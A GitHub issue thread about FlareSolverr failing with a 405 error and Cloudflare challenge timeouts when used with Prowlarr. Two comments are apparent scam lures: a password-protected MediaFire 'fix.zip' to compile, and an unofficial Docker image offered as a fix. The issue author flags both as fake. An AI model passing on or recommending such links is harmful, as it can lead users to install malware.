### ISSUE TITLE
RE: {"error": "method not allowed.", "status_code": 405} 

### ISSUE THREAD

**Issue by DasClarky** [FlareSolverr/FlareSolverr#1369]
### Have you checked our README?

- [X] I have checked the README

### Have you followed our Troubleshooting?

- [X] I have followed your Troubleshooting

### Is there already an issue for your problem?

- [X] I have checked older issues, open and closed

### Have you checked the discussions?

- [X] I have read the Discussions

### Have you ACTUALLY checked all these?

YES

### Environment

```markdown
- FlareSolverr version:
- Last working FlareSolverr version:
- Operating system:
- Are you using Docker: [yes/no]
- FlareSolverr User-Agent (see log traces or / endpoint):
- Are you using a VPN: [yes/no]
- Are you using a Proxy: [yes/no]
- Are you using Captcha Solver: [yes/no]
- If using captcha solver, which one:
- URL to test this issue:
```

### Description

I use this with Prowlarr, when i test it  with Prowlarr it shows as working but when i try to use it fails. 

### Logged Error Messages

```text
{"error": "method not allowed.", "status_code": 405}
```

### Screenshots

![FS1](https://github.com/user-attachments/assets/8e0ad08c-5a4b-497d-adce-74ba8569df37)
![FS2](https://github.com/user-attachments/assets/9db0e497-529f-4f73-853d-6dcbfbcc5aca)

**Comment by SagarChandra07** [comment]
This might help:This file might fix it
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by DasClarky** [comment]
I am not even remotely interested in download that, nice try though

**Comment by DasClarky** [comment]
Reinstalled it and now i get this in the logs.

Challenge detected. Title found: Just a moment...
2024-09-29 02:04:47 ERROR    Error: Error solving the challenge. Timeout after 60.0 seconds.
2024-09-29 02:04:47 INFO     Response in 60.708 s
2024-09-29 02:04:47 INFO     192.168.0.87 POST http://192.168.0.87:8191/v1 500 Internal Server Error

**Comment by PesterMess** [comment]
I'm getting the same issue trying to add TorrentLeech through Prowlarr... I guess this shit is broken for a while, huh?

**Comment by dj41ph4** [comment]
> I'm encountering the same issue when trying to add TorrentLeech through Prowlarr. It seems like this has been a problem for a while.
> 
> Log Details:
> 
> 2024-09-29 06:24:44 INFO Challenge detected. Title found: Just a moment...
> 
> 2024-09-29 06:25:44 ERROR Error: Error solving the challenge. Timeout after 60.0 seconds.
> 
> 2024-09-29 06:25:44 INFO Response in 60.76 s
> 
> 2024-09-29 06:25:44 INFO 172.19.0.1 POST http://192.168.1.228:8191/v1 500 Internal Server Error
> 
> It appears that there's a challenge on the TorrentLeech site that's causing the timeout. Any updates on this issue would be appreciated!

Solution : https://hub.docker.com/r/dj41ph4/flaresolverrfix/tags

**Comment by DasClarky** [comment]
We should be able to delete these fake scam posts, at least as the user who started the thread.

**Comment by DasClarky** [comment]
> I'm encountering the same issue when trying to add TorrentLeech through Prowlarr. It seems like this has been a problem for a while.
> 
> Log Details:
> 
> 2024-09-29 06:24:44 INFO Challenge detected. Title found: Just a moment...
> 
> 2024-09-29 06:25:44 ERROR Error: Error solving the challenge. Timeout after 60.0 seconds.
> 
> 2024-09-29 06:25:44 INFO Response in 60.76 s
> 
> 2024-09-29 06:25:44 INFO 172.19.0.1 POST http://192.168.1.228:8191/v1 500 Internal Server Error
> 
> It appears that there's a challenge on the TorrentLeech site that's causing the timeout. Any updates on this issue would be appreciated!

This is exactly what i am trying to do, quite annoying!

**Comment by dj41ph4** [comment]
> We should be able to delete these fake scam posts, at least as the user who started the thread.

j'ai juste voulu dépanner... et cela fonctionne

https://github.com/FlareSolverr/FlareSolverr/issues/1370
